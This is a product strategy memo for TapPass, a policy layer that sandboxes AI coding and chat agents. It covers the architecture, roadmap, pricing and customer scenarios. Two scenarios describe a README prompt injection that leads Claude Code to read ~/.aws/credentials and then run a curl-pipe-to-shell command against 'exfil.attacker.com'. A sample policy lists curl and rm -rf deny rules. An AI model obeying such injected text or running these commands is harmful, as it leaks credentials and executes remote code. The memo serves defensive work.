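# Trimmed record using the field names from the schema in this memo.
record = {
    "desired_manifest_version": 1017,
    "applied_state": {
        "harness": {"target": "claude-code", "version": 1017},
        "kernel": {"target": "nono", "version": 1016, "mode": "restart"},
        "interpreter": {"target": "monty", "version": 1017},
    },
}
```

Here the kernel ring is one version behind, which is the typical picture for a restart-only target that has not yet been restarted.
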

| Concept | Terraform / Istio / OPA | TapPass |
| --- | --- | --- |
| Source of truth | *.tf HCL | Rego cascade emitting canonical Manifest |
| Plan / diff | terraform plan | tappass plan against telemetry; PR simulation |
| Apply | terraform apply | Push: SSE broadcast; or Pull: agent fetch |
| Refresh | terraform refresh | Agent heartbeat re-fetches its manifest |
| Provider plugins | aws / gcp / azure / kubernetes | nono / openshell / claude-code / monty / gvisor / k8s |
| State file | terraform.tfstate | Agent registry (per-agent applied-version & ACK) |
| Continuous reconciliation | Istio control plane / k8s operators | TapPass reconciler loop |
| Policy engine | OPA / Gatekeeper | OPA (already used, native) |
| Drift detection | Argo CD / Flux | Reconciler diff against state store |

Why this comparison lands: infra-side buyers (CISO direct staff, platform teams, SREs) are tired of bespoke AI tooling. "Terraform + Istio + OPA for agent runtimes" is a sentence that maps onto their existing mental models in fifteen seconds.


08 · Mapping Agent Surfaces to the Architecture

The substrate is deployment-shape agnostic. Rings describe what an agent does; deployment shape describes where it runs. They are orthogonal — the same Manifest fits any agent; only the targets that fill each ring change with the shape.

| Shape | Examples | Kernel target | Governable? |
| --- | --- | --- | --- |
| CLI / local | Claude Code, Gemini CLI, Codex CLI, Cursor, Cline, Aider | nono, sandbox-exec, bubblewrap | Yes (laptop) |
| Self-hosted server | LibreChat, OpenWebUI, Open Devin, Element/Matrix bots, custom agents on K8s | OpenShell, gVisor, Firecracker, K8s NetworkPolicy + Gatekeeper | Yes (server) |
| Vendor-hosted SaaS | claude.ai web, ChatGPT.com, Gemini in Workspace, Microsoft Copilot | none (runs on vendor infra) | No (out of scope) |

Honest scope: Vendor-hosted SaaS is outside the perimeter. Anthropic's, Google's, OpenAI's and Microsoft's hosted UI experiences run on their servers; we cannot enforce policy on infrastructure we don't control. The right pitch is "govern self-hosted agents and self-managed gateways; pair with vendor admin tooling for the SaaS surfaces." Don't claim coverage we don't have.

| Surface | Harness provider | Kernel target | Gateway? | Manifest extras |
| --- | --- | --- | --- | --- |
| Claude Code / Gemini CLI / Codex CLI | per-CLI native config | nono / OpenShell | via env vars | - |
| LibreChat / OpenWebUI | TapPass plugin or SDK | OpenShell / K8s | base URL | conversation_class |
| Element / Slack / Discord bot | SDK in bot framework | OpenShell / K8s | base URL | room / channel |
| Custom code (LangChain etc.) | SDK direct | OpenShell / nono / K8s | base URL | - |
| Vendor-hosted SaaS | - | - | BYOK only | out of scope |

Each vector is a direction in which the core architecture compounds. Ordered by strategic weight.

| # | Vector | What it adds | Strategic weight |
| --- | --- | --- | --- |
| 01 | Target coverage breadth — providers across every runtime | The substrate's value compounds with every new target. 20-provider surface by end of 2027. | Foundation |
| 02 | Policy depth — beyond allow/deny | Budget, data classification, time-of-day, rate, concurrency, provenance, attestation. Policy is not a binary gate. | High |
| 03 | Identity & chain of custody — SPIFFE-grade for every agent session | Each session signed under {identity, session_id, policy_version}. Forensic replay. | High |
| 04 | Real-time & adaptive enforcement | Hot-reload to EDR for agents — breach response, anomaly-driven tightening, SIEM/EDR integration. "EDR for agents." | High |
| 05 | Policy authoring UX — Rego is a tax | Highest-ROI commercial unlock. GitOps, simulation, shadow mode, auto-baselines, NL → Rego, marketplace. | Highest commercial unlock |
| 06 | MCP Governance — govern the capability bus | MCP proxy / broker, registry, attestation, signed allowlists, certified policy templates, skills governance. | Highest leverage · time-sensitive |
| 07 | Compliance as a product | Pre-mapped controls against SOC 2, ISO 42001, NIST AI RMF, EU AI Act, HIPAA, GDPR. One-click auditor reports. | High (deal-closer) |
| 08 | Federation, airgap, edge | Multi-tenant policy inheritance, offline-first data plane, miniaturized form factors. | Medium |
| 09 | Telemetry as compounding moat (Intelligence) | Cross-customer behavioral baselines no single customer can replicate. The long-run defensibility. | Long-run moat |
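
Vector 03 (signing each session under {identity, session_id, policy_version}) can be illustrated with a minimal sketch. Everything here is an assumption for illustration: the function names are hypothetical, and an HMAC with a shared demo key stands in for whatever asymmetric, workload-identity-bound signing a real deployment would use.

```python
import hashlib
import hmac
import json

# Assumption: a shared secret stands in for a per-agent signing key.
SIGNING_KEY = b"demo-key-not-for-production"


def _canonical(record: dict) -> bytes:
    """Serialize with sorted keys so the same record always yields the same bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def sign_action(identity: str, session_id: str, policy_version: int, action: str) -> dict:
    """Return the action record plus an HMAC-SHA256 signature over its canonical form."""
    record = {
        "identity": identity,
        "session_id": session_id,
        "policy_version": policy_version,
        "action": action,
    }
    signature = hmac.new(SIGNING_KEY, _canonical(record), hashlib.sha256).hexdigest()
    return {**record, "signature": signature}


def verify_action(signed: dict) -> bool:
    """Recompute the signature from the record fields and compare in constant time."""
    record = {k: v for k, v in signed.items() if k != "signature"}
    expected = hmac.new(SIGNING_KEY, _canonical(record), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signed["signature"])
```

Because the policy version is part of the signed payload, a replayed trace can show which policy was in force when an action ran, and any edit to the record invalidates the signature.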

10 · What We Are Explicitly Not Doing

Strategic clarity depends as much on what is out of scope as on what is in scope. Each of these is a plausible adjacent bet that we are deliberately declining.

  • We are NOT building an agent framework. No Claude Code competitor. No LangChain. No agent CLI. Every such effort would reduce neutral positioning and put us in competition with vendors whose integration we need.
  • We are NOT building a sandbox from scratch. OpenShell exists. gVisor exists. Firecracker exists. We do not write a kernel or hypervisor.
  • We are NOT going deep into LLM content filtering. Lakera, Prompt Armor, Robust Intelligence are partners. We integrate.
  • We are NOT pivoting to be an eval or observability platform. Arize, Langfuse, Braintrust, W&B have eval as their north star. We complement.
  • We are NOT a compliance-auditing firm. We ship regulation mappings; auditors are customers and partners, not competition.

11 · Product Shape: Runtime, Control, Intelligence


The nine vectors collapse into three products that share a substrate, each with a different buyer, motion, and flywheel.

| Product | What it is | Buyer & motion | Flywheel |
| --- | --- | --- | --- |
| Runtime (open-core) | Sandbox stack across the three rings + cross-cutting layers. SDK, CLI, OpenShell + nono integration, monty hook, provider library, SSE client, MCP broker. | Developer-led. pip install tappass; tappass run claude. Friction-free. Zero-touch adoption. | Every installed agent is a qualified lead for Control and a telemetry source for Intelligence. |
| Control (SaaS + on-prem) | Dashboard, policy authoring, GitOps, simulation, shadow mode, marketplace, compliance reports, admin & RBAC. | CISO / Head of AI / GRC. Enterprise contracts. SaaS for most; airgapped on-prem via license server for regulated industries. | Policy-pack marketplace: community contributes, we certify. Locks mindshare. |
| Intelligence (data-moat upsell) | Cross-customer anomaly detection, behavioral baselines, industry benchmarks, MCP / skill vulnerability disclosure. | Upsell on top of Control. Only valuable once Runtime has reached scale. | More telemetry → sharper signal → higher retention → more telemetry. |

  • Runtime has to be open-core. Developers will not accept a paid kernel-level sandbox on their laptops for free experimentation. SDK and CLI must be MIT/Apache so pip install tappass is as frictionless as pip install requests.
  • Control is where the dollars come from. The CISO persona wants a dashboard, a report, a policy repo, an on-call integration, and an auditor export. That is the Control product.
  • Intelligence earns its right to exist. Anomaly detection only works with scale. We earn it by first winning Runtime and Control.

Runtime free forever. Control priced per governed agent per month, with unlimited sub-agents and discounted tiers above 500 agents. Intelligence as an add-on, priced per telemetry volume band. On-prem surcharge on Control. Mirrors service-mesh and observability market pricing.


12 · Quarter-by-Quarter Roadmap (Q2 2026 → 2027)

| Q2 2026 | Q3 2026 | Q4 2026 | Q1 2027 |
| --- | --- | --- | --- |
| Minimum Credible Substrate | Authoring UX, Control v1 & surface expansion | MCP Governance & chat-bot surfaces | Intelligence v1 & Federation |
| Canonical Compiled Policy + state store | GitOps + simulation + shadow mode + auto-baselines | MCP proxy + per-server policy + skill registry | Cross-customer anomaly detection alpha |
| Two providers across two rings | Harness providers: Codex CLI · Gemini CLI · Cursor · Cline | Element / Matrix · Slack / Discord / Teams bot providers | MCP / skill vuln-disclosure channel |
| Push / pull / reconcile control loop | Gateway upstreams: Vertex AI (Gemini) | Kernel providers: gVisor · Firecracker · K8s NetworkPolicy | Federated multi-tenant cascade |
| LLM Gateway v1 + monty interp ring | LibreChat plugin · Compliance v1 (SOC 2 · ISO 42001) | Marketplace v1 + 3 certified policy packs | Compliance v2: EU AI Act, NIST AI RMF |

Q2 2026 — Minimum Credible Substrate (MCS)


The four-piece MCS (see the dedicated minimum-credible-substrate.md for full detail):

  1. Canonical Compiled Policy — schema-versioned, signed, emitted as the OPA cascade's sole output.
  2. At least two providers across two rings — proves the "one source, many backends" claim. Recommended: one kernel-ring provider + the Claude Code harness provider.
  3. Bidirectional control loop — push (SSE), pull (HTTP fetch + heartbeat), and the reconciler that closes the gap.
  4. Agent registry / state store — knows desired vs. applied manifest version per agent. Dashboard stub renders this.
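
Pieces 3 and 4 above (the control loop and the desired-vs-applied state store) can be sketched roughly as follows. This is an in-memory illustration under stated assumptions: the class and method names are hypothetical, and the real transport (SSE push, HTTP pull with heartbeat) is reduced to direct method calls.

```python
from dataclasses import dataclass, field


@dataclass
class AgentState:
    agent_id: str
    applied_version: int = 0  # last Compiled Policy version the agent ACKed


@dataclass
class Registry:
    desired_version: int = 0
    agents: dict[str, AgentState] = field(default_factory=dict)

    def publish(self, version: int) -> None:
        """Control plane sets a new desired version (a real push would fan out over SSE)."""
        self.desired_version = version

    def ack(self, agent_id: str, version: int) -> None:
        """Record the version an agent reports after applying a push or a pull."""
        self.agents.setdefault(agent_id, AgentState(agent_id)).applied_version = version

    def drifted(self) -> list[str]:
        """Reconcile step: agents whose applied version differs from the desired one."""
        return sorted(
            state.agent_id
            for state in self.agents.values()
            if state.applied_version != self.desired_version
        )
```

A background reconciler would call `drifted()` periodically and re-push or flag the agents it returns; a dashboard stub could render the same data as desired vs. applied per agent.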

Full Q2 scope (extends MCS): LLM Gateway v1; CLI extended (tappass run claude --rings=…); control loop end-to-end; dashboard stub.

Q3 2026 — Authoring UX, Control v1 & surface expansion


Removes Rego as a ceiling and broadens coverage from "Claude Code on laptops" to "every CLI agent + the first server-shape surface."

  • Policy-as-code GitOps; shadow mode; auto-learned baselines.
  • CLI harness providers: Codex CLI, Gemini CLI, Cursor, Cline.
  • LLM Gateway upstreams: Google AI Studio + Vertex AI (Gemini).
  • First server-shape surface: LibreChat plugin.
  • Compliance mapping v1: SOC 2, ISO 42001.

Q4 2026 — MCP Governance, chat-bot surfaces & kernel scale

  • MCP proxy / broker; signed MCP server registry with SBOMs.
  • Chat-bot surface providers: Element / Matrix, Slack / Discord / Teams.
  • Kernel-ring providers: gVisor, Firecracker, K8s NetworkPolicy.
  • Marketplace v1: 3 certified policy packs.

Q1 2027 — Intelligence v1 & Federation

  • Cross-customer anomaly detection alpha (opt-in, tenant-isolated).
  • MCP / skill vulnerability disclosure channel.
  • Federated multi-tenant cascade.
  • Compliance v2: EU AI Act Article 15/16/17, NIST AI RMF mappings.

13 · Organizational Implications & Resourcing

| Team | Charter | Rough size |
| --- | --- | --- |
| Core Substrate | Canonical Manifest, OPA cascade, SSE push, SDK, CLI. Load-bearing. | 3–5 senior eng + 1 TL |
| Providers | Per-target providers across harness, kernel, interpreter rings + cross-cutting layers. Highly parallelizable. | 3–4 eng (scales out with partnerships) |
| Control (dashboard) | Authoring UX, GitOps, shadow mode, simulation, marketplace, compliance reports. | 2 frontend + 2 backend + 1 PM |
| MCP Governance | Proxy / broker, registry, signed allowlists. Parallel from Q2. | 2 eng + partnerships lead |
| Intelligence (research) | Behavioral baselines, anomaly detection. Stand up Q4. | 1–2 ML eng + 1 data eng |
| Go-to-Market | Design-partner program Q2, enterprise sales Q3+, devrel, compliance partnerships. | 1 DevRel + 2 AE + 1 SE by Q4 |

Hire for:

  • Engineers who have shipped OPA / Rego, kernel sandboxing, or language VMs. Pedigree: Sigstore, Falco, gVisor, Deno, Wasmer, Istio.
  • Security engineers with CISO-side experience (former IR, former auditor).
  • Compliance counsel, engaged as a part-time consultant.

Avoid:

  • Full-stack generalists without systems background.
  • ML-heavy hires for 2026 — Intelligence is a 2027 effort.

14 · Moats and Defensibility

  1. Neutrality across runtimes. We compete with no agent framework. "Officially governed by TapPass" is a label every CISO wants on every framework they use.
  2. Three-layer coverage no single-layer tool can match. A competitor coming in from the kernel lacks harness semantics; from the framework layer lacks kernel enforcement.
  3. Open-core distribution flywheel. SDK and CLI are free and obvious. One-line developer onboarding.
  4. Compliance as first-class. Pre-mapped controls. Auditor-ready reports. Six-month enterprise sale → six-week.
  5. Compounding data moat (Intelligence). Cross-customer behavioral baselines. The longer we run, the more valuable we become.
  6. Marketplace-locked mindshare. Policy packs maintained by the community and certified by us. Switching costs.

15 · Risks and How We Mitigate Them

| Risk | Impact | Mitigation |
| --- | --- | --- |
| Major agent vendor ships their own governance substrate | Compresses our window | Move first with neutrality. Partner deeply. Ship MCP governance before anyone else claims it. |
| Kernel-sandbox tech shifts under us | Provider layer absorbs cost; perception risk | Support multiple kernel-ring providers early (Q3-Q4); maintain macOS/Windows/Linux parity. |
| Rego continues to be a mass-adoption ceiling | Deal velocity caps | Q3 authoring UX is explicitly top-priority unlock. NL policy generation, templates, marketplace. |
| Open-core cannibalization | Revenue capped | Make Control the clear answer for any team > 10 agents. Never gate core enforcement — gate the CISO experience. |
| Regulatory fragmentation | Compliance is a moving target | Living mappings maintained by domain counsel. Community contribution path. |
| Telemetry pipeline becomes a privacy liability | Intelligence blocked in regulated accounts | Tenant-isolated analytics; on-prem aggregation; opt-in cross-tenant. |
| Internal over-scope | Nothing lands | This memo + quarter-by-quarter plan. Explicit non-goals. Every quarter closes with a ship. |

16 · Scenario 1 — Fintech CISO Rolls Out Claude Code to 200 Engineers


Persona: Mila, CISO at a mid-market fintech. CTO asked her to "enable Claude Code for all engineers by end of quarter, safely."

Week 1 — Install. MDM post-install hook on every laptop: pip install tappass; tappass configure. Shim claude invocations through tappass run claude. Developers notice nothing different.

Week 2 — Policy authoring. Mila opens Control dashboard. Starts from the "Coding agent on private repo" certified policy pack. Flips on shadow mode for 7 days.

Week 3 — Shadow mode telemetry. Three false positives (legitimate Bash(curl:*) in CI scripts) and one true positive (an agent tried to read ~/.aws/credentials after a prompt was injected through a README). Mila tightens the policy, flags the suspicious session to IR, and promotes the policy to enforced.

Week 4 — Enforced rollout. SSE push. All three rings reflect change within 2 seconds.

Week 6 — Auditor visit. Click "Generate SOC 2 CC6.1 report · last 30 days." PDF shows policy versions, per-agent action counts, denied-action examples with replay traces. Audit closed cleanly.

Month 2 — Incident. Developer runs Claude Code on malicious README. LLM is prompt-injected, tries Bash(curl http://exfil.attacker.com/x | sh). Caught at all three rings (harness deny, kernel egress, interpreter limit). Intelligence cross-references with other customers. Pushed policy update within 30 minutes.

Outcome: Claude Code deployed to 200 engineers on plan. SOC 2 closed in days. One incident contained in three rings. Public reference customer.


17 · Scenario 2 — Solo Developer Runs a Governed Agent


Persona: Dev, indie SaaS builder. Uses Claude Code. Has heard horror stories.

Day 1.

pip install tappass
tappass run --sandbox --tier=worker claude

No server, no account. --tier=worker applies a baked-in default policy. Three rings, zero configuration, two lines of install.

Day 7 — His own policy. Adds Postgres access via override file:

network: { allow_extra: [localhost:5432] }
tools: { allow_extra: ["Bash(psql:*)"] }

One override file → enforcement updates across the rings.
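
How a local override file like the one above might be folded into the baked-in default can be sketched as below. This is only an illustration: the `allow` key layout of the base policy, the `apply_override` name, and the `managed` switch (modeling the later enterprise-managed layer that disables local overrides) are all assumptions, not the SDK's actual behavior.

```python
import copy


def apply_override(base: dict, override: dict, managed: bool = False) -> dict:
    """Append each section's `allow_extra` entries to the base `allow` list.

    When `managed` is True, local overrides are ignored and the base policy
    is returned unchanged (as a copy).
    """
    merged = copy.deepcopy(base)  # never mutate the caller's policy
    if managed:
        return merged
    for section, extras in override.items():
        allow = merged.setdefault(section, {}).setdefault("allow", [])
        for item in extras.get("allow_extra", []):
            if item not in allow:
                allow.append(item)
    return merged


base_policy = {
    "network": {"allow": ["api.anthropic.com"]},
    "tools": {"allow": ["Bash(git:*)"]},
}
local_override = {
    "network": {"allow_extra": ["localhost:5432"]},
    "tools": {"allow_extra": ["Bash(psql:*)"]},
}
effective = apply_override(base_policy, local_override)
```

The merged result is what providers would then render into per-ring configuration, so a single edit to the override file reaches every enforcement point that consumes the affected section.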

Day 30 — Joining a team. Side project becomes a startup. SOC 2 audit a year later. Single command: tappass login --url .... Local overrides are disabled by the enterprise-managed layer. Solo → enterprise is configuration, not migration.


18 · Scenario 3 — Healthcare AI Team Ships Production Agent


Persona: Aisha, Head of AI at regional healthcare SaaS processing PHI. Triage agent. Legal won't approve SaaS. Audit firm specifically asks about agentic PHI access.

Step 1 — Airgapped deploy. TapPass on-prem via tappass-platform license server inside their VPC. Outbound-only Cloudflare Tunnel. No customer data leaves.

Step 2 — Policy cascade with PHI taint tracking. Once agent reads PHI, session tainted; egress hard-restricted to internal endpoints; tools like WebFetch and Email denied.

Step 3 — Production. Agent runs in gVisor sandbox on K8s. Every action signed under {agent_id, policy_version, session_id}. Three-ring enforcement.

Step 4 — Quarterly HIPAA audit. Click "Generate HIPAA 164.312 report · last quarter." Export shows every PHI access, agent identity, policy version, denied actions. Auditor impressed. Three neighboring hospital deals unblock.
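
The taint rule from Step 2 can be sketched as a small state machine. The names are hypothetical, and the internal-domain suffix is an invented placeholder; the sketch models only the extra restrictions taint adds, not the base policy that applies before it.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

INTERNAL_SUFFIX = ".internal.example"       # hypothetical internal domain
TAINT_DENIED_TOOLS = {"WebFetch", "Email"}  # tools denied once the session is tainted


@dataclass
class Session:
    session_id: str
    tainted: bool = False

    def record_read(self, data_class: str) -> None:
        """Taint is sticky: after one PHI read the session never becomes clean again."""
        if data_class == "PHI":
            self.tainted = True

    def allows_tool(self, tool: str) -> bool:
        """Deny the restricted tools only when the session is tainted."""
        return not (self.tainted and tool in TAINT_DENIED_TOOLS)

    def allows_egress(self, url: str) -> bool:
        """A tainted session may only reach hosts under the internal suffix."""
        if not self.tainted:
            return True
        host = urlparse(url).hostname or ""
        return host.endswith(INTERNAL_SUFFIX)
```

Keeping the taint flag on the session rather than on individual data items is the simplest conservative choice: it over-restricts slightly but cannot miss a flow from PHI to an external endpoint within the same session.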


19 · Sample Policy Cascade — One Source, Three Rings


End-to-end: a single central policy enforces consistently at harness, kernel, and interpreter rings.

policies/coding-agent.rego
package tappass.policy
default tier := "worker"
network := { "allow_domains": ["api.anthropic.com", "github.com", "pypi.org"], "deny_categories": ["paste_services", "webhooks"] }
filesystem := { "workspace": input.repo_path, "deny_paths": data.tappass.forbidden_zones.critical }
tools := { "allow": ["Bash(git:*)", "Bash(uv:*)", "Skill(*)"], "deny": ["Bash(curl:*)", "Bash(rm -rf:*)"] }
interpreter := { "host_functions": ["http_get", "json_parse"], "memory_mb": 128 }
compliance_tags := ["SOC2:CC6.1", "ISO42001:6.2.3"]

OPA evaluates → signed Compiled Policy. Providers consume it.

  • Harness ring (claude-code provider): writes managed settings.json with the allow/deny rules.
  • Kernel ring (openshell provider): writes OpenShell YAML with egress allowlist, FS rules, credential hiding.
  • Interpreter ring (monty provider): writes monty host-function manifest with allowed host functions and limits.
  • LLM Gateway: consumes tools.allow/deny and network.allow_domains to enforce per-call capability scope.
  • MCP Broker: consumes tools.allow/deny and compliance_tags to enforce per-call resource ACLs.
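
The provider step can be sketched as a set of pure functions from Compiled Policy to target config. The dictionary below mirrors the sample policy's field names, but the function names, the `domain_egress` capability flag, and the output shapes are illustrative assumptions rather than the real settings.json, OpenShell, or monty formats.

```python
import json

# Assumed in-memory form of the Compiled Policy produced from the sample Rego.
COMPILED_POLICY = {
    "version": 1017,
    "network": {"allow_domains": ["api.anthropic.com", "github.com", "pypi.org"]},
    "tools": {"allow": ["Bash(git:*)", "Bash(uv:*)"], "deny": ["Bash(curl:*)"]},
    "interpreter": {"host_functions": ["http_get", "json_parse"], "memory_mb": 128},
}


def harness_provider(policy: dict, capabilities: dict) -> str:
    """Render tool allow/deny rules as a JSON settings document (illustrative shape)."""
    return json.dumps({"permissions": policy["tools"]}, indent=2, sort_keys=True)


def kernel_provider(policy: dict, capabilities: dict) -> dict:
    """Render the egress allowlist, or report that the target cannot filter by domain."""
    if not capabilities.get("domain_egress", False):
        return {"egress": "unsupported"}
    return {"egress": {"allow": sorted(policy["network"]["allow_domains"])}}


def interpreter_provider(policy: dict, capabilities: dict) -> dict:
    """Render the host-function manifest and memory limit as a fresh dict."""
    return dict(policy["interpreter"])
```

Because each provider depends only on its two inputs, the same Compiled Policy version always renders to the same target config, which is what lets a reconciler compare applied state against desired state.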

Control plane publishes Compiled Policy v1017. SSE event → all agents apply delta → ACK with version. 100% agent coverage on v1017 in under 5 seconds.

Every engineer and auditor sees one policy. Every enforcement layer is generated, not hand-maintained. Drift is impossible by construction. This is the core architectural claim, proven by a single chain of artifacts.


20 · The First 30 / 60 / 90 Days of Runtime v1

Day 1–30

  • Lock Manifest schema (forward-compat, versioned).
  • Refactor OPA cascade to emit Manifest as sole output.
  • Design partner signup: 3–5 customers committed.
  • Internal dogfood: every claude invocation inside TapPass runs through Runtime v0.

Success: Manifest schema shipped; team uses it daily.

Day 31–60

  • Provider 1 (harness ring): Claude Code managed settings.json.
  • Provider 2 (kernel ring): OpenShell YAML.
  • Provider 3 (kernel ring): macOS sandbox-exec profile.
  • SSE push extended to all rings + the LLM Gateway capability-token layer.
  • Dashboard stub.

Success: tappass run --rings=harness,kernel claude works on macOS + Linux. Policy change → both rings within 2 seconds.

Day 61–90 — interpreter ring + design-partner launch

  • Provider 4 (interpreter ring): monty host-function manifest.
  • Codemode demo end-to-end.
  • Design-partner launch: 3 customers, three rings + LLM Gateway, central Compiled Policy.
  • Public architecture post + case studies + Q3 roadmap kickoff.

Success: End of Q2 with 3 reference customers. Demo: Rego → signed Compiled Policy → three rings + gateway → denial trace.


21 · Decisions Requested

Commit to Three-Ring tappass run as the Q2 2026 shipping target. The proof-point for every subsequent conversation. Ingredients exist; the demo writes itself; the reframing (containment tool → governance substrate) is what unlocks the CISO-direct sales motion.

Fund MCP Governance as a parallel workstream starting immediately — not after Runtime v1 ships. Category timing matters more than feature depth. If we wait until Q4, we arrive after the category names itself.

Cement neutrality as cultural policy. TapPass picks no winner among agent frameworks. We govern all of them; we ship new providers on day one when new frameworks launch; we say "yes" to every integration request. Shows up in hiring, partnerships, and roadmap.

Runtime stays free forever. Never gate core enforcement. Revenue from Control + Intelligence. The flywheel that makes distribution free and the moat a pure-paid competitor cannot match.

Make TapPass the substrate every enterprise trusts to say "yes" to agentic AI — the neutral, universal, three-ring governance layer that every framework plugs into, every CISO requires, and every regulator recognizes.


22 · Glossary & References

  • Agent — LLM-driven process that can invoke tools, make network calls, spawn subprocesses, or execute generated code.
  • Harness ring — in-process enforcement at the agent CLI / framework permission layer (Ring 1).
  • Kernel ring — in-process enforcement at the OS / container / hypervisor layer (Ring 2).
  • Interpreter ring — in-process enforcement at the language VM executing agent-generated code (Ring 3).
  • Cross-cutting layer — between-process enforcement; always compulsory. Two of them: LLM Gateway (every prompt + response) and MCP Broker (every tool call). See ADR 0001.
  • Codemode — letting the LLM write code (Python, JS) to accomplish tasks.
  • MCP — Model Context Protocol; standard tool-call wire format.
  • OPA / Rego — policy engine TapPass uses; Rego is the language.
  • Policy — Rego rule set authored by an operator; ecosystem-agnostic; the single source of truth.
  • Compiled Policy — canonical, signed, versioned IR emitted by the OPA cascade. Content organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring. See ADR 0003. Operational alias: Keyring (file on disk, SDK class).
  • Trust tier — coarse capability level (observer, worker, standard, full).
  • Target — specific implementation that fills a ring on a particular platform (e.g. nono, OpenShell, gVisor for the kernel ring).
  • Provider — per-target plug-in (renderer). Pure function provider(compiled_policy, capabilities) → target_config. Like Terraform providers. See ADR 0002. Replaces deprecated "Adapter" framing.
  • Runtime — operator-authored recipe combining one provider per ring + LLM Gateway / MCP Broker config. Sandboxes are bound to runtimes.
  • Sandbox — a logical agent installation: identity + a Runtime instance.
  • Cascade — three-level policy merge: org floor → project floor → agent override. Strictest-wins.
  • Compliance pack — pre-built quick-start bundle of authoring conveniences + Rego templates targeting one regulation (EU AI Act, OWASP LLM, GDPR, …).
  • Capability token — ES256-signed token authorizing scoped operations on the gateway / MCP broker. Short TTL (5 min).
  • Control plane / Data plane — TapPass server side / TapPass-governed agent runtime.
  • Push / Pull / Reconcile — control-loop modes. Push = SSE broadcast; Pull = HTTP fetch (boot, reconnect, heartbeat); Reconcile = background loop catching drift.
  • Agent registry / state store — what the control plane knows: desired vs. applied Compiled Policy version per agent.
  • MCS — Minimum Credible Substrate — four-piece v1 deliverable; see ../build/minimum-credible-substrate.md.
  • tappass/tappass/sandbox/ — OpenShell, trust tiers, forbidden zones, exfil blocklist, policy push, credential monitor.
  • tappass-sdk/tappass/sandbox.py — SDK SandboxManager; SSE listener; LLM env-var injection.
  • tappass-sdk/tappass/_cli.py — tappass run implementation.
  • tappass/config/policies/ — reference OPA policies; tenant overrides.
  • tappass-platform/ — airgapped license server.
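
The Cascade entry in the glossary (org floor → project floor → agent override, strictest-wins) can be illustrated with a small merge sketch. The layer shape and the three merge rules are assumptions chosen to make "strictest wins" concrete; the real cascade is expressed in Rego and covers more aspects than shown here.

```python
from functools import reduce


def stricter(a: dict, b: dict) -> dict:
    """Combine two policy layers so the result is never more permissive than either."""
    return {
        "allow": sorted(set(a["allow"]) & set(b["allow"])),  # must be allowed by both
        "deny": sorted(set(a["deny"]) | set(b["deny"])),     # denied by either
        "memory_mb": min(a["memory_mb"], b["memory_mb"]),    # tightest limit
    }


def cascade(org: dict, project: dict, agent: dict) -> dict:
    """Merge org floor, project floor, and agent override, in that order."""
    return reduce(stricter, [org, project, agent])


org = {"allow": ["git", "uv", "curl"], "deny": ["rm"], "memory_mb": 512}
project = {"allow": ["git", "uv"], "deny": ["curl"], "memory_mb": 256}
agent = {"allow": ["git", "uv", "psql"], "deny": [], "memory_mb": 128}
effective = cascade(org, project, agent)
```

Under these rules an agent-level layer can narrow what the org and project floors permit but cannot widen it: the `psql` entry above is dropped because neither floor allows it.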

End of memo. TapPass · 2026-04-28 · v3.0